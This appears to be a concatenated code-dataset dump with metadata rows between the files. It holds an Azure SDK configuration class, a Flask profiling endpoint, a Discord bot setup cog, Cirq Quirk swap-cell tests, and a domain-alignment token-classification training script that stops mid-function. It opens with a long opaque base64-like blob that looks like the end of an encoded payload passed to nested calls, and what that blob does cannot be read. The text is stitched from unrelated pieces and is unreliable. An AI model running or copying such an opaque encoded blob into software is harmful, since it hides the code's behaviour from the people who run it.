KQ2XBKlMwRxuSquYi5Rg66pjuGrbMLW64YEZHLGoOjYFBYYIUBiIXEoWq4GxBEMyGRx1wizLMzDMbWqlBVDCyYW5ZWsrQsUtmUoo6tkpqg4LKNtrQRZlMcxaCIyCyZChClkrEqiVskwyUhsswoq2gUmQEYphcI3dgAJIIyCfc0ketJKZEN1IdEKGGtVxSFbDY0Gp5TjzieoNQ2pLEsw+Rx9mV8lBmfyJfpTbggRnYlJqXeRSjGerpAsp4TYJpYgbZCkP18RHpnPYszekAEEztmI9h7/nwHuEvgCr5AhaQtkH+OzNrNhoMO887DJb7AmYKiFpGW1wB8957IAC67uj7ZsQvqI3AMi/gHNCO3P9DmTPJBwxtm0FBsYoIxWGQtSOAOSME5n4Q1vXMpRaj3uzoASQiyhTPQCzFFJxZl+vyBI1k+EgCVtdpBIQEQQ8NK5sUzQdJzROFZFA8EXotO+uByKOgjDO/4wIVy5QnDtWSBs+tl/UD0YcJAF5jYwGWZpjdlsjHD+xrib4jMuvPDI2BqOYxL7Kvx9v42lUA99yuM5GrgzVQ4AJIQyVAIWCwWPZHJjAlNrhae+88CRqC+NLeWRL+ICSEMoVZM3kTVs8ToY1MFDRAZWrn7xRYWK4MZiy/GVgT3IDHa7PBK+9VWphurGXoxKylw0yDLCkOgAt2IDZDse96pURdihAyFjYA/BrsBt/4AFcDCGCLkwEm6U7C9Bh913OwmfY9vmiW7Z4Nnyzhf0E+3mBjxzMknbcRYxg/WAkhFURZ6vDkXMuPFa/z/Z0onQ4oDBI60m5jjwBExiYMSlmBzG5J2JB3brJzvzGGlPVlhawbDnsQs0UuN5aHNQ1Oq7rZgHSz5tYZIGudDTtlwHdoCSCT+rKPD0Fpn0VWshHeD7+EBa/RasgHdWblElaLRdZm0UlmnTeTIjDkJrBmIDWoR6HiiZ3VJoq9G7AKK0CQqIg1Fp638U7ASOTpqjSJnKwapQbne6440nMxtkZ2xfXLQBJCLyjJFCEqrWDWqYppSF7c53WykG0CP/yVao6tc3t8KSsdXlJUkFOjQDFBzIO3zgBoMsRJHNcGzs5DlCfJYIrzLMtv9CbYQB1Z9PXz7+VakQH7tavfNtJWCvE7hCyOaUjYGmoWCaNRAv/GM12EU2w7hOYk1KJBImRBGSNL1MLRRwyvqLeA1Qv3PrxgXSUk5CGiIoS10HvKWmbD7uhBZfruv/eSJ9wjA5G/A1mqQU0mRbr1uwkxUeO9qP2mLKBUVqAutrFqTJXTEXSALy0D8Kd1oAVqoL+As+IiceyMB4L8k+Py65JjPukjBBRgkIh9tJns6+5V9JRL7osaH+GPd6AOieXKWh8QswmE+ruKmXQtsl66EKDEsS1zU+OoCU5+woiad1SCXkmDY2xpGS7NQ6IMT9oCSEWLpxgmrVXZHVIxgVAqPSh6eLUBYp+UCSEH4UAQd0B+QnZLJLnZeKZePuFwi3aWyAlalNo4DPTZebvWwGbCEiBpkXZzCB+jEQFCIIyNnN5kwsVrIuTBEEP18l/SAkhG82pFlppuRK4BJCIPKQbBp/n2orKfauII8/Hyp9XKkXahGXEMOGYb/nYjvGgk2+e9aQTM7vbTanaBglZ2ps7yv1tG5ibEE00B6NKwEGgBqElxBdByKt9ZvRH/cYI9X/J4BvNAfYea347eA2ibOMuRyIk8hxYMaZKUPbfv3eIGrPxuWRcisak0NptiBjY00P40FD/ODO1GiQc76zjvxaOrHTxfcq3GAt6PfhIkDAeUBrK7e5LlnngXTqb9blsxra1I7D+YCSEZgtWpzz9UTnC6J0BmroFIRQO0td13CfGL1nW5y9wCSEMMPia1jUNQIGofZBAyCECSESfsRhYEBuLRvRoRe0i4Py84wJqzXCm0K7QxmIm+Wo65Ka6Dnu5/LKw48dQty1MDbBAt0o4EQtl3LVo9WGraQZZoxpEt5gWGhkzNZyYHt0gDWiEb6B0lt8j5+Z267P8QdkHSczyd41zqLza49B/rNKyxeMMmDjyu3LMG58GbrtXDHFKFMBFnC294ZmDpkrDMLQ6dbOJ04GOOZhyUsyva64KnFKqYJcccMLitByjDGNDDEaFJXhWqFFWzbo1xtBy4UuQRbDDKWpFUoZRpDajvqn1ez0n0J8Pxeen3voyQ+PieXwX06/EGWneyrIDIgJfWjFhw4xhzWV5zAw5cSXWvkiwM0dQGIDFdqvQcaj+zqGvgAewTOmz1nEPZY2X11aNoVa1MESgMg0aXLILLMUVoey8cvGzVcZiYeSXGRY8yQMyDGkz8Hj8TnK8QOg1B1cfbktF0A2DNTgewiJjkQ4I1ycpk3oxFFYxiixFAzD+GBWJ8nTgMScJ6vFLsIet/95pqx7fvgSQg+ZA3SIdzHTtur2ZzGTjoOS9EwG0XIvk5EDQYECJICBQJrVMlzjJtIRRAdlsmW5Il8YreQDSdvHi+Aw2DA1rw11wTEaMkNoGxK9gTaCAZFqkCYEoqI1nnUiyJ+ZrYYE3aucOPPABjUKg23LqNpx3G+v722LMFU8wR1goO226L7djPhGXjqa83MXrVSJGWMWqRASBId2JEAMJeUZT322q1Emagvj5fVt48lL/ko0CguLts1YFUOti9PAVgamkVBFEYcMg6s7KpHKyfuWw16FZ/kOcwOB4NfomolxgXg9M4RtABJBHl1Dhzk7qA1NteR4x0sf+ASQjX59q/J6+KVtd40P6ezn2Zj9mSO7u3lGLHVISJ21e2s2uhsYYu263gIuRiBRfXxxutMkAfU+W+9ye7uj9jD0n2bqbW1NoGbm4ZduGmjpK40RY0pbWraYmYVLMiUiQMjIFbjiKNuo67jmluNa5u0HUbMpiDaWMKOFkMBGVAULJkKFCWzRpbWShAQi2u7cMUXMxkKYJkxCosyxHJgWBehlDpdjzATmtlMa3JhTDBLFDJKJRMEpMkqoLCkLRnEsS2iZJDMEsyR7EPOdXv4V9/CYj4xttXxQCj52h528mmBZEh5dO2fOBJCHShyy2dwPcAf3MxyQGHcATrcsXmMknVLlzslSCkXRBejHwFmKnPifKVRM7A9L1mMdMoQu1pBf0Z2aA1h40lOZRMsUHsNdiKCHgmAMANdUVEXfF4qmD1rDhXHAP4KA0CQEBXNJQ82mnh6f21JlG3YCJCG59OmjW8VJ1CYtOBQgOieMMW/RNGIvYsUJJ3ccrUwCKS73OiodpMZ+YaFJmcOEEg8OE0OhItEiUw88NInqOvAccADAtlAonhYypm0SnfLY5hmDK41rRUAYr0EPvnM1iIzJ1oW52A7Cllk44Xi9tfNeOCJxS2xBl/GEMsbD6xkSMJgQQokEEZoGwgOQgYICMhx3pAnU56RKhVSpgciAgxSTNXJhC2WGBokVwwhEQb6PH0Tx8AkLcljv731Oe8OcisnAxkBCsXez2ZXeY7r7L7UTDG+fggJAaloFhOhtuv8Z43pFcITGgG1hy6uOpY5JcTkYQDiGuISkoE2pQMg4HCz9g64m4VQuHvY4ZEQleDIUIaGG3AGxMEWq
EA03sIjZEcgEAcDLLplZmcIvwuL+NlvIiIlbLIoE/jKrVqqLCp95g+hbBgDrcHXXXnY7zKp3TcJ1XaeZRA6jY0LWIVQrsE0WiQmQ2MGRyxODXAOG6TILQHOed2cCThZvB7gEkInYkzFnoQLkldkBdaH2OmvPOd9tw4kEqSnnNuGUdmcC7bjZXBHwYQ8+tg+jHIKXYAiqTAwY1JAcrXYW2YIzUT10ObdXy6TdvDe0xoLUGyZr3bTlnN0NJEoziSlETiWSVATuZNEk0XJEDs5ju5ESSwdUPdkZjWTEQge2JD5kjS1OQATxMcFvLlXkQdACSEYWBz0AKZ61y6EoUzuERpB8w/mB2SzXPh0IYvjeDtOexDX31OXconKUkVqtdOm2QAdIWgU5x0643D09e6vIMvuLOKMOUyj4MbShVL1q4V06enXgkgEnOeePU8Y6E3ur2umJR4IBJTzpj3k5ZMJrz+UBJCM7LDgKBucCtmTNAbOgD7jrHzcfpk2yuHSxEEw4RJIopjbR9FKohw3Q/eQxZoyjEQWcWlZwmm7hW2XB4V4cl1FyH2OPCcY8u86PO8hynLggnO83QUKKqKcPRh0YLdLwrQRBgjCvS45k6OY10xn4nWbWk2OFJ0TUyho4phhmTCuS4LLGL0yzNUbjUa9KZiTcwgEM5IEnQLEfH6ZXUTb6VQk1o72SatHcmU66+YNuCcD1TVNv+jXiR7D1eVy0dapbtCpnmNzV17tJb0d8BIRtDi0UHuHQ7ZovRVEV5q22qqoSotVBzFcgo1voTcVdVXIqj2c5rbpHpmBaczeGvq8ifhZEPb9J9V9n0ZMjlnTjjjSTokMCzjNhkBhWfN7bMp+1x06E49gEkIPWjw60UMO2yGdP2mR9ICSEQpI5TBgPjqNDFADNxAIIAcdYlB7GLsAokxQpChVYQgAkRLttL0Fr5ZHIY5gkSLSWgH9RdyRThQkIta79sA==')))
| 290.290323
| 8,086
| 0.927436
|
83b9e3ae9428bd64e025fe51872801c48b9831c4
| 2,933
|
py
|
Python
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/subscriptions/_configuration.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/subscriptions/_configuration.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/subscriptions/_configuration.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMHttpLoggingPolicy
from ._version import VERSION
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any
from azure.core.credentials import TokenCredential
class SubscriptionClientConfiguration(Configuration):
"""Configuration for SubscriptionClient.
Note that all parameters used to create this instance are saved as instance
attributes.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials.TokenCredential
"""
def __init__(
self,
credential, # type: "TokenCredential"
**kwargs # type: Any
):
# type: (...) -> None
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
super(SubscriptionClientConfiguration, self).__init__(**kwargs)
self.credential = credential
self.credential_scopes = kwargs.pop('credential_scopes', ['https://management.azure.com/.default'])
kwargs.setdefault('sdk_moniker', 'azure-mgmt-resource/{}'.format(VERSION))
self._configure(**kwargs)
def _configure(
self,
**kwargs # type: Any
):
# type: (...) -> None
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.http_logging_policy = kwargs.get('http_logging_policy') or ARMHttpLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.RetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.RedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
if self.credential and not self.authentication_policy:
self.authentication_policy = policies.BearerTokenCredentialPolicy(self.credential, *self.credential_scopes, **kwargs)
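# A minimal usage sketch (not part of the generated file): constructing the
# configuration directly with a credential. `DefaultAzureCredential` from
# `azure.identity` is an assumption about the caller's environment; in normal
# use this configuration is created for you by `SubscriptionClient`.
def _example_configuration():
    from azure.identity import DefaultAzureCredential
    config = SubscriptionClientConfiguration(credential=DefaultAzureCredential())
    return config.credential_scopes  # ['https://management.azure.com/.default']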
| 44.439394
| 129
| 0.684964
|
eaa9ea91796b203b680481b10a621fbec141c03c
| 631
|
py
|
Python
|
pipeline/playground/feature_server.py
|
shawntsai/insight-project
|
67b7ad25c51b0065f958ee499653c91213263cfc
|
[
"MIT"
] | 3
|
2018-02-12T02:48:12.000Z
|
2018-08-01T10:17:09.000Z
|
pipeline/playground/feature_server.py
|
shawntsai/insight-project
|
67b7ad25c51b0065f958ee499653c91213263cfc
|
[
"MIT"
] | null | null | null |
pipeline/playground/feature_server.py
|
shawntsai/insight-project
|
67b7ad25c51b0065f958ee499653c91213263cfc
|
[
"MIT"
] | 1
|
2018-04-07T06:34:53.000Z
|
2018-04-07T06:34:53.000Z
|
import sys
import json
import feature_utils as fu
from flask import Flask
from flask import jsonify
from flask import request
app = Flask(__name__)
@app.route('/')
def hello():
return 'hello world'
@app.route('/profiling', methods=['POST'])
def profiling():
data = json.loads(request.data)
    if 'table_name' not in data or 'type' not in data:
        return 'you should provide both table_name and type'
table_name = data['table_name']
data_type = data['type']
result = fu.profiling(table_name, data_type)
return jsonify(result)
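# A minimal client-side sketch (not part of the server): POSTing a profiling
# request with `requests`. The host, port and payload values are placeholders.
def _example_profiling_request(port=5000):
    import requests
    payload = {'id': 1, 'platform': 'demo', 'table_name': 'my_table', 'type': 'csv'}
    resp = requests.post('http://localhost:%d/profiling' % port, data=json.dumps(payload))
    return resp.json()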
if __name__ == '__main__':
port = int(sys.argv[1])
app.run(port=port)
| 21.033333
| 54
| 0.681458
|
bed896d10aa972b6636f03f718978f641749541c
| 4,747
|
py
|
Python
|
bot/cogs/setup_all.py
|
tescomealdealll/PixeL
|
ad38b1105a465bf08bd652e61e3e12d4ed9d2872
|
[
"MIT"
] | null | null | null |
bot/cogs/setup_all.py
|
tescomealdealll/PixeL
|
ad38b1105a465bf08bd652e61e3e12d4ed9d2872
|
[
"MIT"
] | null | null | null |
bot/cogs/setup_all.py
|
tescomealdealll/PixeL
|
ad38b1105a465bf08bd652e61e3e12d4ed9d2872
|
[
"MIT"
] | null | null | null |
import discord
import traceback
import app_util
from bot.extras.emojis import Emo
from bot.views.msg_view import sub_view_msg
from bot.views.youtube_view import sub_view_youtube
from bot.views.receiver_view import sub_view_receiver
from bot.views.pingrole_view import sub_view_pingrole
from bot.views.reception_view import sub_view_reception
from bot.views.welcome_view import sub_view_welcomecard
async def check(ctx: app_util.Context):
def check():
p = ctx.channel.permissions_for(ctx.me)
return p.send_messages and p.embed_links and p.attach_files and p.external_emojis
if not ctx.guild:
await ctx.send_response('🚫 This command can only be used inside a **SERVER**')
elif not ctx.author.guild_permissions.manage_guild:
await ctx.send_response('> 👀 You are not an **Admin** or **Server Manager**')
elif not check():
await ctx.send_response(
            f'> 😓 Please make sure I have permissions to send `embeds`, `custom emojis`, and `attachments`'
elif not ctx.options:
await ctx.send_response('> 👀 you must select **at least one option**')
elif len(ctx.options) > 1:
await ctx.send_response('> 👀 please use only **one option at a time**')
else:
return True
class Setup(app_util.Cog):
def __init__(self, bot: app_util.Bot):
self.bot = bot
@app_util.Cog.command(
command=app_util.SlashCommand(name='ping', description='shows the avg latency of the bot'),
guild_id=877399405056102431
)
async def ping_command(self, ctx: app_util.Context):
await ctx.send_response(f'**Pong:** {round(self.bot.latency * 1000)}ms')
@app_util.Cog.command(
command=app_util.SlashCommand(
name='setup',
description='configure PixeL for your server',
options=[
app_util.StrOption(
name='youtube',
description='type any youtube channel by url or id',
required=False),
app_util.ChannelOption(
name='receiver',
description='text channel to receive youtube videos',
channel_types=[
app_util.DiscordChannelType.GUILD_TEXT,
app_util.DiscordChannelType.GUILD_NEWS],
required=False),
app_util.ChannelOption(
name='reception',
description='text channel to receive welcome cards',
channel_types=[
app_util.DiscordChannelType.GUILD_TEXT,
app_util.DiscordChannelType.GUILD_NEWS],
required=False),
app_util.RoleOption(
name='ping_role',
description='role to ping with youtube notification',
required=False),
app_util.AttachmentOption(
name='welcome_card',
description='image file to send when new member joins',
required=False),
app_util.IntOption(
name='custom_message',
description='custom welcome and notification message',
choices=[
app_util.Choice(name='upload_message', value=1),
app_util.Choice(name='welcome_message', value=0),
app_util.Choice(name='livestream_message', value=2),
],
required=False),
],
)
)
@app_util.Cog.before_invoke(check=check)
async def setup_command(
self, ctx: app_util.Context,
*,
youtube: str, ping_role: discord.Role, receiver: discord.TextChannel,
reception: discord.TextChannel, welcome_card: discord.Attachment, custom_message: int):
if youtube:
await ctx.defer()
await sub_view_youtube(ctx, youtube)
return
if receiver:
await ctx.defer()
await sub_view_receiver(ctx, receiver)
return
if reception:
await ctx.defer()
await sub_view_reception(ctx, reception)
return
if ping_role:
await ctx.defer()
await sub_view_pingrole(ctx, ping_role)
return
if welcome_card:
await ctx.defer()
await sub_view_welcomecard(ctx, welcome_card.url)
return
if custom_message is not None:
await sub_view_msg(ctx, custom_message, self.bot)
return
async def setup(bot: app_util.Bot):
await bot.add_application_cog(Setup(bot))
| 37.377953
| 103
| 0.585001
|
5042e03a589ab98f123485fab08bd0b8b656d832
| 2,315
|
py
|
Python
|
cirq-core/cirq/interop/quirk/cells/swap_cell_test.py
|
LLcat1217/Cirq
|
b88069f7b01457e592ad69d6b413642ef11a56b8
|
[
"Apache-2.0"
] | 1
|
2021-04-29T15:30:32.000Z
|
2021-04-29T15:30:32.000Z
|
cirq-core/cirq/interop/quirk/cells/swap_cell_test.py
|
bradyb/Cirq
|
610b0d4ea3a7862169610797266734c844ddcc1f
|
[
"Apache-2.0"
] | 4
|
2022-01-16T14:12:15.000Z
|
2022-02-24T03:58:46.000Z
|
cirq-core/cirq/interop/quirk/cells/swap_cell_test.py
|
bradyb/Cirq
|
610b0d4ea3a7862169610797266734c844ddcc1f
|
[
"Apache-2.0"
] | 2
|
2021-09-22T11:16:46.000Z
|
2021-09-23T12:55:22.000Z
|
# Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import cirq
from cirq.interop.quirk.cells.testing import assert_url_to_circuit_returns
from cirq import quirk_url_to_circuit
def test_swap():
a, b, c = cirq.LineQubit.range(3)
assert_url_to_circuit_returns('{"cols":[["Swap","Swap"]]}', cirq.Circuit(cirq.SWAP(a, b)))
assert_url_to_circuit_returns(
'{"cols":[["Swap","X","Swap"]]}', cirq.Circuit(cirq.SWAP(a, c), cirq.X(b))
)
with pytest.raises(ValueError, match='number of swap gates'):
_ = quirk_url_to_circuit('https://algassert.com/quirk#circuit={"cols":[["Swap"]]}')
with pytest.raises(ValueError, match='number of swap gates'):
_ = quirk_url_to_circuit(
'https://algassert.com/quirk#circuit={"cols":[["Swap","Swap","Swap"]]}'
)
def test_controlled_swap():
a, b, c, d = cirq.LineQubit.range(4)
assert_url_to_circuit_returns(
'{"cols":[["Swap","•","Swap"]]}', cirq.Circuit(cirq.SWAP(a, c).controlled_by(b))
)
assert_url_to_circuit_returns(
'{"cols":[["Swap","•","Swap","•"]]}', cirq.Circuit(cirq.SWAP(a, c).controlled_by(b, d))
)
def test_with_line_qubits_mapped_to():
a, b, c, d = cirq.LineQubit.range(4)
a2, b2, c2, d2 = cirq.NamedQubit.range(4, prefix='q')
cell = cirq.interop.quirk.cells.swap_cell.SwapCell(qubits=[a, b], controls=[c, d])
mapped_cell = cirq.interop.quirk.cells.swap_cell.SwapCell(qubits=[a2, b2], controls=[c2, d2])
assert cell != mapped_cell
assert cell.with_line_qubits_mapped_to([a2, b2, c2, d2]) == mapped_cell
def test_repr():
a, b, c, d = cirq.LineQubit.range(4)
cirq.testing.assert_equivalent_repr(
cirq.interop.quirk.cells.swap_cell.SwapCell(qubits=[a, b], controls=[c, d])
)
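# A small usage sketch of the parser exercised above (kept out of pytest
# collection by the leading underscore): a two-qubit Swap column should parse
# to a single SWAP gate on LineQubits 0 and 1.
def _example_quirk_swap():
    circuit = quirk_url_to_circuit(
        'https://algassert.com/quirk#circuit={"cols":[["Swap","Swap"]]}')
    a, b = cirq.LineQubit.range(2)
    return circuit == cirq.Circuit(cirq.SWAP(a, b))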
| 37.95082
| 97
| 0.68121
|
5ce2d59ce71b5c4af9c41aee596e6057d3a33e83
| 32,302
|
py
|
Python
|
run_token_cls.py
|
rxian/domain-alignment
|
c523a6d193fa644520235535d5b03858930a2a97
|
[
"MIT"
] | null | null | null |
run_token_cls.py
|
rxian/domain-alignment
|
c523a6d193fa644520235535d5b03858930a2a97
|
[
"MIT"
] | null | null | null |
run_token_cls.py
|
rxian/domain-alignment
|
c523a6d193fa644520235535d5b03858930a2a97
|
[
"MIT"
] | null | null | null |
"""
Fine-tuning a 🤗 Transformers model on token classification tasks (NER, POS, CHUNKS).
Adapted from https://github.com/huggingface/transformers/blob/master/examples/pytorch/token-classification/run_ner_no_trainer.py
"""
import argparse
import logging
import numpy as np
import torch
from torch.optim import AdamW
from torch.utils.data import DataLoader
from tqdm.auto import tqdm
import transformers
from transformers import MODEL_MAPPING, AutoConfig, AutoModelForTokenClassification, AutoTokenizer, DataCollatorForTokenClassification, SchedulerType, default_data_collator, get_scheduler, set_seed
from datasets import load_metric
import load_dataset_token_cls
from load_dataset_token_cls import load_raw_dataset, tokenize_raw_dataset
import domain_alignment
logger = logging.getLogger(__name__)
# You should update this to your particular problem to have better documentation of `model_type`
MODEL_CONFIG_CLASSES = list(MODEL_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
def get_class_dist(dataset, num_classes):
# Counts labels in the `dataset` and returns the class distribution.
class_dist = torch.zeros(num_classes)
l, c = np.unique([x for y in dataset['labels'] for x in y],return_counts=True)
if -100 in l:
l, c = l[1:], c[1:]
class_dist[l] = torch.tensor(c/np.sum(c)).type(class_dist.dtype)
return class_dist
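# A small illustrative sketch (not used by the training script): with two
# classes and labels [[0, 1, -100, 1]], the -100 padding label is dropped and
# the returned distribution should be tensor([1/3, 2/3]).
def _example_class_dist():
    toy_dataset = {'labels': [[0, 1, -100, 1]]}
    return get_class_dist(toy_dataset, num_classes=2)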
def flatten_outputs(mask,*args):
# Flatten outputs from (batch_size, max_sequence_length, feature_dim)
# to (num_tokens, feature_dim), where num_tokens only counts "active"
# tokens.
#
# `mask` is used to remove (non-active) tokens that do not have a label.
# This is because most NER implementations only tag the first wordpiece
# of a word. This also masks out [CLS] and [SEP] tokens.
mask = mask.view(-1)
flattened = []
for arg in args:
if len(arg.shape) == 2:
arg = arg.view(-1)
else:
arg = arg.view(-1, arg.shape[-1])
flattened.append(arg[mask==0])
if len(flattened) == 1:
return flattened[0]
elif len(flattened) > 1:
return flattened
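# A small illustrative sketch of the masking convention above (not used by the
# training script): positions where `mask` is 0 are kept as "active", which is
# why callers pass `~active_indices`.
def _example_flatten_outputs():
    mask = torch.tensor([[0, 1], [0, 0]])  # one masked-out (non-active) token
    logits = torch.arange(8, dtype=torch.float).view(2, 2, 2)
    labels = torch.tensor([[5, -100], [7, 9]])
    flat_logits, flat_labels = flatten_outputs(mask, logits, labels)
    return flat_logits.shape, flat_labels  # torch.Size([3, 2]), tensor([5, 7, 9])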
def main():
args = parse_args()
# Make one log on every process with the configuration for debugging.
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
# Setup logging, we only want one process per machine to log things on the screen.
# accelerator.is_local_main_process is only True for one process per machine.
logger.setLevel(logging.INFO)
load_dataset_token_cls.datasets.utils.logging.set_verbosity_warning()
transformers.utils.logging.set_verbosity_info()
if args.disable_tqdm:
# https://stackoverflow.com/a/67238486/7112125
from functools import partialmethod
tqdm.__init__ = partialmethod(tqdm.__init__, disable=True)
# If passed along, set the training seed now.
if args.seed is not None:
set_seed(args.seed)
# Get the source domain dataset.
raw_datasets, label_list, label_to_id, text_column_name, label_column_name = load_raw_dataset(
dataset_name=args.dataset_name_source,
dataset_config_name=args.dataset_config_name_source,
train_file=args.train_file_source,
evaluation_file=args.evaluation_file_source,
text_column_name=args.text_column_name_source,
label_column_name=args.label_column_name_source,
task_name=args.task_name,
)
num_labels = len(label_list)
# Metrics
metric = load_metric("seqeval")
def get_labels(predictions, references):
        # Transform predictions and references tensors to numpy arrays
y_pred = predictions.detach().cpu().clone().numpy()
y_true = references.detach().cpu().clone().numpy()
# Remove ignored index (special tokens)
true_predictions = [
[label_list[p] for (p, l) in zip(prediction, label) if l != -100]
for prediction, label in zip(y_pred, y_true)
]
true_labels = [
[label_list[l] for (p, l) in zip(prediction, label) if l != -100]
for prediction, label in zip(y_pred, y_true)
]
return true_predictions, true_labels
def compute_metrics():
results = metric.compute()
if args.return_entity_level_metrics:
# Unpack nested dictionaries
final_results = {}
for key, value in results.items():
if isinstance(value, dict):
for n, v in value.items():
final_results[f"{key}_{n}"] = v
else:
final_results[key] = value
return final_results
else:
return {
"precision": results["overall_precision"],
"recall": results["overall_recall"],
"f1": results["overall_f1"],
"accuracy": results["overall_accuracy"],
}
# Load pre-trained model and tokenizer
config = AutoConfig.from_pretrained(args.model_name_or_path, num_labels=num_labels)
tokenizer_name_or_path = args.tokenizer_name if args.tokenizer_name else args.model_name_or_path
if config.model_type in {"gpt2", "roberta"}:
tokenizer = AutoTokenizer.from_pretrained(tokenizer_name_or_path, use_fast=True, add_prefix_space=True)
else:
tokenizer = AutoTokenizer.from_pretrained(tokenizer_name_or_path, use_fast=True)
model = AutoModelForTokenClassification.from_pretrained(args.model_name_or_path, config=config)
model.to(args.device)
# Tokenize the source domain dataset
train_dataset_source, eval_dataset_source = tokenize_raw_dataset(
tokenizer=tokenizer,
raw_datasets=raw_datasets,
label_list=label_list,
label_to_id=label_to_id,
text_column_name=text_column_name,
label_column_name=label_column_name,
pad_to_max_length=args.pad_to_max_length,
max_length=args.max_length,
label_all_tokens=args.label_all_tokens,
)
# DataLoaders creation:
if args.pad_to_max_length:
        # If padding was already done to max length, we use the default data collator that will just convert everything
# to tensors.
data_collator = default_data_collator
else:
# Otherwise, `DataCollatorForTokenClassification` will apply dynamic padding for us (by padding to the maximum length of
# the samples passed).
data_collator = DataCollatorForTokenClassification(tokenizer)
train_dataloader_source = DataLoader(train_dataset_source, shuffle=True, collate_fn=data_collator, batch_size=args.train_batch_size_per_domain)
eval_dataloader_source = DataLoader(eval_dataset_source, collate_fn=data_collator, batch_size=args.eval_batch_size)
# Get, tokenize, and create DataLoaders for target domain datasets
train_dataloader_target = None
eval_dataloader_target = None
if any([x is not None for x in [args.dataset_name_target, args.train_file_target, args.evaluation_file_target]]):
train_dataset_target, eval_dataset_target = tokenize_raw_dataset(
tokenizer,
*load_raw_dataset(
dataset_name=args.dataset_name_target,
dataset_config_name=args.dataset_config_name_target,
train_file=args.train_file_target,
evaluation_file=args.evaluation_file_target,
text_column_name=args.text_column_name_target,
label_column_name=args.label_column_name_target,
task_name=args.task_name,
),
pad_to_max_length=args.pad_to_max_length,
max_length=args.max_length,
label_all_tokens=args.label_all_tokens,
)
train_dataloader_target = DataLoader(
train_dataset_target, shuffle=True, collate_fn=data_collator, batch_size=args.train_batch_size_per_domain
)
eval_dataloader_target = DataLoader(eval_dataset_target, collate_fn=data_collator, batch_size=args.eval_batch_size)
# Optimizer
# Split weights in two groups, one with weight decay and the other not.
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay,
'lr': args.lr,
}, {
"params": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],
"weight_decay": 0.0,
'lr': args.lr,
}
]
optimizer = AdamW(optimizer_grouped_parameters)
# Scheduler and math around the number of training steps.
num_update_steps_per_epoch = int(np.ceil(len(train_dataloader_source) / args.grad_accumulation_steps))
if args.num_train_steps is None:
args.num_train_steps = args.num_train_epochs * num_update_steps_per_epoch
else:
args.num_train_epochs = int(np.ceil(args.num_train_steps / num_update_steps_per_epoch))
lr_scheduler = get_scheduler(
name=args.lr_scheduler_type,
optimizer=optimizer,
num_warmup_steps=int(np.ceil(args.num_train_steps*args.warmup_ratio)),
num_training_steps=args.num_train_steps,
)
# Create domain adversary, and its optimizer
model_ad = None
im_weights_estimator = None
optimizer_ad = None
if args.domain_alignment:
feature_size = model.config.hidden_size
if args.use_cdan_features:
# In CDAN, discriminator feature is kronecker product of model feature output and softmax output
feature_size *= num_labels
im_weights = None
source_class_dist = get_class_dist(train_dataset_source, num_labels).type(torch.float32)
if args.use_im_weights and not args.estimate_im_weights:
# Class-importance-weighted domain adaptation with oracle IW
if args.target_class_dist is not None:
# Importance weights are provided by the user (oracle)
target_class_dist = torch.tensor(args.target_class_dist)
else:
# Target class distribution not provided; get from labeled target dataset (for evaluating IWDA-oracle)
target_class_dist = get_class_dist(train_dataset_target, num_labels)
im_weights = target_class_dist/source_class_dist
if args.domain_alignment_loss == 'w1':
model_ad = domain_alignment.W1CriticWithImWeights(feature_size, args.hidden_size_adversary, im_weights=im_weights)
elif args.domain_alignment_loss == 'jsd':
model_ad = domain_alignment.JSDAdversaryWithImWeights(feature_size, args.hidden_size_adversary, im_weights=im_weights)
elif args.domain_alignment_loss == 'mmd':
model_ad = domain_alignment.MMDWithImWeights(im_weights=im_weights, kernel_mul=args.mmd_kernel_mul, kernel_num=args.mmd_kernel_num, fix_sigma=args.mmd_fix_sigma)
model_ad.to(args.device)
if args.use_im_weights and args.estimate_im_weights:
